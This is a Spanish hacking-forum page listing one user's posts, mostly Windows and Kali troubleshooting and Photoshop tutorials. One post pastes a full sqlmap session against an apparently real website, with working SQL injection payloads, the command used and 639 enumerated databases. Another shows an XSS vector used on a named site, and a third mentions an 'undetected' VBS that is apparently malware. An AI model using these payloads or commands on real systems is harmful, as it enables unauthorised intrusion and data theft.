Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - meteor0

#1
Muy buenas, hoy me andaba la conexión severamente lenta ni siquiera podía llegar abrir alguna pagina web. Así que llame a mi ISP, el cual como solución tenia resetear el wifi remotamente, acto seguido me llamó al móvil para no perder la charla por voz mientras mi wifi (conectado al telefono fijo) se reseteaba me dijo que le habia cambiado el SSID y la clave, me dijo las credenciales del router y acto seguido procedí a conectarme a la red.
Cuando iba a darle a "Conectar" para poder proceder a poner la nueva contraseña me saltó esto

" Microsoft Visual C++ Runtime Library

Runtime Error! Program: C:\Windows\System32\SystemSettingsBroker.exe

This application has requested the Runtime to terminate in an unusual way. Please contact the application's support team for more information."


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pensaba que era una error tipico de los Windows, pero por lo que he buscado no he encontrado a ninguno con "SystemSettingsBroker.exe".

El caso ahora es que mirando en la red he visto que se tienen que reinstalar las librerías de Microsoft Visual C++, cosa que ya hice sin ningún resultado, he deshabilitado el antivirus y el firewall y nada.
Lo peor de todo es que cada vez que tengo que descargar algo tengo que ir al portátil de mi hermano instalarlo desde ahí y después pasarlo en un USB para finalmente descargarlo en el mío ya que no tienen

Quería saber si pueden ayudarme en esto ya que por ahora ha sido uno de los problemas más tediosos que he tenido
Especificaciones:

SO: Windows 10
Procesador: Intel Core i5-6200U CPU @ 2.30 GHz 2.40 GHz
RAM: 8,00 GB
Arquitectura del sistema: 64 bits

Gracias de antemano
#2
Galería / C4D AGAIN
Junio 20, 2015, 07:06:25 AM
Proyecto en C4D y PS para youtube
#3
Bueno hoy volvia de las recuperaciones de mi instituto, y como és normal llegue encendí el ordena inicie sesión a skype y de repente se me va la conexión, bueno hasta todo me parecía normal conecte unos cables de ethernet y ya pero de pronto veo skype y veo que alguien me habla diciendo en ingles ''Un negrata me dijo que le intentastes DOSEAR con una booter de 5 dolares y aqui estoy yo el listillo''.
Bueno cuando me dijo esto ya estaba completamente seguro que era un DDoS a mi router asi que me gustaria saber como mitigar este ataque, tambien me bloqueo la entrada a páginas web ya que cuando intentaba entrar a google me redirigia a la administración de router en la pagina inicial con un codigo que creo que enviaba la contraseña a una pagina web era codigo php como no sabía que hacer encendi el APATEDNS y el WIRESHARK para capturar el tráfico quisiera saber como arreglarlo y si puedo hacer algo con la infromación que tengo en los dos programas
Lo gracioso de esto es que yo no he doseado a nadie jajajaaj

Gracias Saludos Meteor
#4
Dudas y pedidos generales / [SOLUCIONADO] Fallo con SQLMap
Diciembre 29, 2014, 04:01:23 PM
Buenas hoy andaba jugando un poco con SQLMAP en kali pero la cosa es que todas las paginas en las que intente entrar mediante una vulnerabilidad SQLi
me saltaba siempre el mismo resultado

Código: text
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:45:31

[19:45:31] [WARNING] unable to create default root output directory '/usr/share/sqlmap/output' ([Errno 13] Permission denied: '/usr/share/sqlmap/output'). Using temporary directory '/tmp/sqlmapoutput_nLGTu' instead
[19:45:31] [INFO] testing connection to the target URL
[19:45:32] [INFO] testing if the target URL is stable. This can take a couple of seconds
[19:45:33] [INFO] target URL is stable
[19:45:33] [INFO] testing if GET parameter 'id' is dynamic
[19:45:34] [INFO] confirming that GET parameter 'id' is dynamic
[19:45:34] [INFO] GET parameter 'id' is dynamic
[19:45:34] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[19:45:34] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y
[19:45:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:45:36] [WARNING] reflective value(s) found and filtering out
[19:45:38] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[19:45:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[19:45:39] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[19:45:39] [INFO] testing 'MySQL inline queries'
[19:45:39] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:45:39] [WARNING] time-based comparison requires larger statistical model, please wait...................
[19:45:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[19:45:48] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[19:46:09] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
[19:46:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[19:46:09] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:46:11] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:46:12] [INFO] target URL appears to have 8 columns in query
[19:46:13] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 40 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=15 AND 4624=4624

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=15 AND (SELECT 9008 FROM(SELECT COUNT(*),CONCAT(0x7163777371,(SELECT (CASE WHEN (9008=9008) THEN 1 ELSE 0 END)),0x716b767471,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=15 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7163777371,0x49496759657943627947,0x716b767471)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=15 AND SLEEP(5)
---
[19:46:15] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.25
back-end DBMS: MySQL 5.0
[19:46:15] [INFO] fetching database names
available databases [639]:
[*] antispam
[*] con464274
[*] cop244027
[*] cop585447
[*] cop686640
[*] cop851481
[*] db000811
[*] db006107
[*] db006708
[*] db012000
[*] db012436
[*] db013520
[*] db014741
[*] db015324
[*] db017046
[*] db021462
[*] db022082
[*] db022136
[*] db023003
[*] db033444
[*] db034868
[*] db037602
[*] db045226
[*] db046826
[*] db047202
[*] db048636
[*] db051032
[*] db054377
[*] db054546
[*] db057537
[*] db057788
[*] db058680
[*] db061673
[*] db063035
[*] db063432
[*] db075504
[*] db081634
[*] db082316
[*] db082641
[*] db083054
[*] db085407
[*] db087365
[*] db101325
[*] db101341
[*] db101484
[*] db101701
[*] db107651
[*] db112033
[*] db112106
[*] db114138
[*] db115220
[*] db116375
[*] db124676
[*] db126101
[*] db128110
[*] db130262
[*] db131584
[*] db135437
[*] db135460
[*] db136462
[*] db136582
[*] db141708
[*] db147648
[*] db147884
[*] db148010
[*] db150780
[*] db151354
[*] db152172
[*] db154474
[*] db154507
[*] db155012
[*] db155051
[*] db155883
[*] db156137
[*] db157012
[*] db158344
[*] db161487
[*] db161836
[*] db168040
[*] db172740
[*] db175035
[*] db175323
[*] db180227
[*] db182376
[*] db182406
[*] db186476
[*] db188441
[*] db213220
[*] db214747
[*] db215024
[*] db217232
[*] db218340
[*] db220420
[*] db221336
[*] db223671
[*] db227435
[*] db227882
[*] db228121
[*] db233177
[*] db234312
[*] db235316
[*] db238781
[*] db240548
[*] db244601
[*] db245783
[*] db250551
[*] db251535
[*] db252127
[*] db252553
[*] db254276
[*] db255188
[*] db255343
[*] db256114
[*] db257151
[*] db260581
[*] db261503
[*] db263717
[*] db264643
[*] db267876
[*] db268421
[*] db271614
[*] db274260
[*] db276166
[*] db278660
[*] db280606
[*] db281576
[*] db287410
[*] db288487
[*] db300755
[*] db302565
[*] db305530
[*] db310283
[*] db315418
[*] db317506
[*] db318811
[*] db321360
[*] db323754
[*] db328273
[*] db330558
[*] db330731
[*] db333386
[*] db336880
[*] db340800
[*] db345163
[*] db345661
[*] db347107
[*] db348437
[*] db350751
[*] db351482
[*] db353151
[*] db354086_backup
[*] db354852
[*] db357777
[*] db358004
[*] db358228
[*] db360867
[*] db362332
[*] db362634
[*] db364614
[*] db367024
[*] db368220
[*] db368638
[*] db370121
[*] db372877
[*] db374830
[*] db376171
[*] db381226
[*] db383227
[*] db383546
[*] db384052
[*] db384052_alt
[*] db385438
[*] db385713
[*] db386364
[*] db386734
[*] db387722
[*] db388115
[*] db402855
[*] db404702
[*] db406512
[*] db407610
[*] db408053
[*] db410117
[*] db410343
[*] db413368
[*] db415371
[*] db421427
[*] db422252
[*] db423083
[*] db424244
[*] db427277
[*] db428170
[*] db428277
[*] db430345
[*] db431428
[*] db431776
[*] db432625
[*] db437187
[*] db437528
[*] db441078
[*] db444417
[*] db445438
[*] db445818
[*] db446201
[*] db447316
[*] db447852
[*] db448362
[*] db448846
[*] db453167
[*] db454056
[*] db455403
[*] db456816
[*] db460826
[*] db463171
[*] db463706
[*] db464604
[*] db465571
[*] db466124
[*] db467722
[*] db473075
[*] db473724
[*] db473866
[*] db475526
[*] db478075
[*] db480306
[*] db481047
[*] db486851
[*] db510831
[*] db513500
[*] db514424
[*] db516113
[*] db516504
[*] db517734
[*] db522602
[*] db523201
[*] db526876
[*] db530741
[*] db530832
[*] db532634
[*] db533022
[*] db533671
[*] db534252
[*] db534560
[*] db543720
[*] db544781
[*] db546487
[*] db546737
[*] db547324
[*] db550155
[*] db550281
[*] db551115
[*] db553841
[*] db553843
[*] db554113
[*] db555725
[*] db556230
[*] db557716
[*] db558532
[*] db561157
[*] db561651
[*] db562037
[*] db562268
[*] db566557
[*] db568418
[*] db568547
[*] db572315
[*] db575500
[*] db575728
[*] db577801
[*] db578644
[*] db578871
[*] db581342
[*] db585750
[*] db588762
[*] db600148
[*] db603260
[*] db605654
[*] db608346
[*] db608438
[*] db614254
[*] db614373
[*] db616377
[*] db620665
[*] db623340
[*] db624110
[*] db627280
[*] db627567
[*] db628538
[*] db631423
[*] db633048
[*] db634263
[*] db636164
[*] db636865
[*] db640126
[*] db642160
[*] db644012
[*] db644780
[*] db646716
[*] db647333
[*] db648533
[*] db651221
[*] db651322
[*] db651513
[*] db651545
[*] db653262
[*] db655311
[*] db656442
[*] db658024
[*] db662031
[*] db662081
[*] db662173
[*] db662621
[*] db663275
[*] db664220
[*] db665214
[*] db665734
[*] db667285
[*] db671438
[*] db671472
[*] db674662
[*] db675768
[*] db675804
[*] db677260
[*] db677607
[*] db680404
[*] db682144
[*] db683641
[*] db684244
[*] db688044
[*] db700613
[*] db706547
[*] db710416
[*] db711463
[*] db713103
[*] db714143
[*] db714482
[*] db714566
[*] db718218
[*] db720180
[*] db722351
[*] db722722
[*] db723313
[*] db725268
[*] db725412
[*] db725567
[*] db725803
[*] db728356
[*] db728511
[*] db730802
[*] db736664
[*] db737085
[*] db738048
[*] db738664
[*] db750146
[*] db750504
[*] db754342
[*] db754686
[*] db756186
[*] db760774
[*] db763482
[*] db766785
[*] db766878
[*] db770704
[*] db771732
[*] db772865
[*] db773031
[*] db775250
[*] db776734
[*] db778508
[*] db778708
[*] db778823
[*] db780184
[*] db780444
[*] db780742
[*] db782480
[*] db783805
[*] db784356
[*] db787852
[*] db803188
[*] db805648
[*] db808273
[*] db811512
[*] db813674
[*] db813750
[*] db814600
[*] db815448
[*] db820186
[*] db822187
[*] db823546
[*] db825070
[*] db831123
[*] db831767
[*] db832324
[*] db833673
[*] db834535
[*] db834557
[*] db835400
[*] db835615
[*] db842522
[*] db844040
[*] db845620
[*] db846463
[*] db846464
[*] db846612
[*] db847700
[*] db847780
[*] db850166
[*] db852263
[*] db852623
[*] db852721
[*] db854286
[*] db855702
[*] db855838
[*] db857064
[*] db858267
[*] db860881
[*] db862502
[*] db871106
[*] db873275
[*] db873417
[*] db874260
[*] db875237
[*] db875507
[*] db875844
[*] db876444
[*] db881284
[*] db882572
[*] db884102
[*] db885701
[*] drup217552
[*] drup413037
[*] drup686356
[*] drup727014
[*] drup855253
[*] egw286400
[*] egw537225
[*] egw745061
[*] goffice320272
[*] goffice448740
[*] goffice576671
[*] information_schema
[*] jo020747
[*] jo022864
[*] jo036555
[*] jo038576
[*] jo045078
[*] jo045378
[*] jo056223
[*] jo067371
[*] jo077876
[*] jo083777
[*] jo088554
[*] jo101414
[*] jo107121
[*] jo108210
[*] jo111152
[*] jo112407
[*] jo133670
[*] jo134278
[*] jo150542
[*] jo155532
[*] jo167276
[*] jo171364
[*] jo181554
[*] jo184853
[*] jo200463
[*] jo225228
[*] jo237711
[*] jo244574
[*] jo263320
[*] jo311500
[*] jo317685
[*] jo330477
[*] jo354614
[*] jo356062
[*] jo362064
[*] jo371565
[*] jo375171
[*] jo378002
[*] jo403818
[*] jo410032
[*] jo423455
[*] jo432773
[*] jo437583
[*] jo474542
[*] jo486840
[*] jo504505
[*] jo545522
[*] jo560653
[*] jo563768
[*] jo567424
[*] jo605187
[*] jo621210
[*] jo622041
[*] jo630520
[*] jo636886
[*] jo640128
[*] jo650623
[*] jo660514
[*] jo667863
[*] jo684604
[*] jo685602
[*] jo704341
[*] jo707585
[*] jo708557
[*] jo711807
[*] jo713257
[*] jo716624
[*] jo718302
[*] jo718868
[*] jo742444
[*] jo748541
[*] jo751033
[*] jo762830
[*] jo782774
[*] jo806151
[*] jo848120
[*] jo851610
[*] jo861017
[*] jo868224
[*] jo878873
[*] mwiki012146
[*] mwiki151510
[*] mwiki300341
[*] mwiki531443
[*] mwiki805554
[*] mysql
[*] osc021211
[*] osc051828
[*] osc135420
[*] osc166150
[*] osc514344
[*] osc655755
[*] osc688753
[*] osc708041
[*] osc744185
[*] osc828643
[*] oxd084661
[*] oxd625307
[*] oxd686053
[*] oxd771270
[*] piwik024143
[*] piwik541488
[*] piwik643713
[*] pn_nagios
[*] poll723244
[*] reseller
[*] resellers-queue
[*] roundcubemail
[*] sexypaar
[*] smf058778
[*] smf624668
[*] smf656763
[*] smf670041
[*] smf683445
[*] smf683825
[*] t3002413
[*] t3020431
[*] t3048368
[*] t3055818
[*] t3060103
[*] t3067700
[*] t3070256
[*] t3073507
[*] t3087661
[*] t3101574
[*] t3164757
[*] t3188224
[*] t3218040
[*] t3273243
[*] t3276581
[*] t3400554
[*] t3417065
[*] t3417862
[*] t3430725
[*] t3452276
[*] t3502742
[*] t3507178
[*] t3511224
[*] t3515461
[*] t3516175
[*] t3524780
[*] t3525382
[*] t3534736
[*] t3542217
[*] t3570432
[*] t3578007
[*] t3613846
[*] t3626586
[*] t3660780
[*] t3663227
[*] t3688828
[*] t3703563
[*] t3705207
[*] t3728768
[*] t3758823
[*] t3784108
[*] t3815271
[*] t3850245
[*] t3858451
[*] t3hifiTJfn1k
[*] t3inprMLKJ0K
[*] t3lady7Yr6Va
[*] t3lingQuAilG
[*] t3natiOdzMwf
[*] t3schuAXUkoK
[*] t3themcVYr5U
[*] tmpdir
[*] webcontrol
[*] wp003781
[*] wp127442
[*] wp170615
[*] wp268667
[*] wp328673
[*] wp431433
[*] wp450763
[*] wp464106
[*] wp501030
[*] wp525540
[*] wp526874
[*] wp535282
[*] wp548043
[*] wp617472
[*] wp622325
[*] wp666834
[*] wp706043
[*] wp735412
[*] wp764773
[*] wp777268
[*] wp803250
[*] wp828847
[*] wp875114
[*] wp877002
[*] xtcm030252
[*] xtcm176438
[*] xtcm223571
[*] xtcm555058
[*] xtcm700277
[*] xtcm831878



[*] shutting down at 19:46:17

sqlmap -u http://www.domain.com/produktdetail.php?id=15 --dbs [esa fue la sintaxis]


Nose que hacer alguna idea?
En todas me saltaba lo mismo
#5
Hacking ShowOff / [XSS] Flipop.net
Septiembre 10, 2014, 10:36:37 AM
Una imagen mostrando la falla

La url del sitio
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Url en donde se realizo la inyeccion
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector utilizado
"><script>alert('/METEOR/')</script>
Y si fue reportado o no la falla
REPORTADO
#6
Galería / BANNER CON C4D Y PSCS6
Septiembre 08, 2014, 05:17:03 PM

#7
Bueno ya viene siendo casi 2 o 3 meses que quiero instalarme el kali linux y no puedo!!

Bueno el problema es que cuando le doy a "graphic install" se me crashea y se me queda con el fondo predetermina de kali linux
#8
Tutoriales / Creación de Isotipo
Julio 07, 2014, 03:43:15 PM
CREACIÓN DE ISOTIPO

Bueno le he echado otra ojeada rápida al foro.. y bueno vengo con la intención de enseñar todo lo que sé y bueno.. no está mal el foro pero tenemos que subir ya el grado de habilidad

Bueno mi ordenador no es que sea muy bueno, tampoco tengo micro asi que os ayudaré siempre a escrito. Vale hoy os enseñare a empezar a tener un poco más de complejidad a un grado fácil (Creación de logotipos o isotipos)

-Vale lo primero es una hoja en blanco en nuestro PSD

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

P2- Creamos una capa nueva. Sirve para que los trazos se hagan esten en la capa nueva no en el fondo
Ej: Si cogemos y empezamos a dibujar encima del fondo el trazo no servira absolutamente de nada

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

P3- Empezamos a dibujar con la herramienta pluma el isotipo que queremos hacer (le damos a la tecla alt [flechita para arriba encima de ctrl] para hacer lineas rectas ok empezemos)

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

P4- Yo por ejemplo quiero otra igual solo tendré que darle con la herramienta pluma en el  logotipo>click derecho>rellenar trazado>
ahora tenemos que quitar el trazado solo tenemos que hacer click derecho en el logotipo (click derecho>eliminar trazado)

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


P5- Wuala! Acabado está... Bueno este es un pequeño boceto que he estado haciendo a ritmo del tuto..


Link Descarga el boceto : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Bueno espero que lo entendáis mas o vale putitas bueno eso es todo si quereis que haga un post sobre como añadirle efectos 3D con C4D y editandolo en PSCS6 paso a paso solo decidmelo
#9
Bueno desde hace unas semanas atras tenia pensado descargar el Kali Linux, bueno ya he descargado la .ISO estoy en el virtual box y no me carga al intentar descargar los graphics

La captura de vídeo esta bien :
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Despues le doy a descargar
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Y se me queda así
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Necesito ayuda. Perodenme la gente que alomejor le haya molestado tener una duda en una cosa tan simple
#10
Bueno ayer me descargue NOTEPAD++ hasta ahí bien me iva el ordenador perfectamente pero todo fue que me intalé el VBS FULL UNDETECTED de la pagina de UNDERC0DE y al apagarlo y volverlo a iniciar me salia:

La pantalla en negro y abajo en una esquinza derecha ponia
Compilacion 7706
Windows 7
Esta copia no es original

Quisiera saber a que es debido este fallo ya que nunca me habia salido y claro esta esto mas un retraso total de navegador y aplicaciones no respondian cada 2 min.

Ya limpie el ordenador limpie el navegador .. creo que va bien pero quiero saber a que se debe el fallo ya que nunca lo habia visto